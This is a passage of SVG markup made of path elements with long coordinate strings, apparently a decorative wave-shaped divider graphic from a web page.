51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path 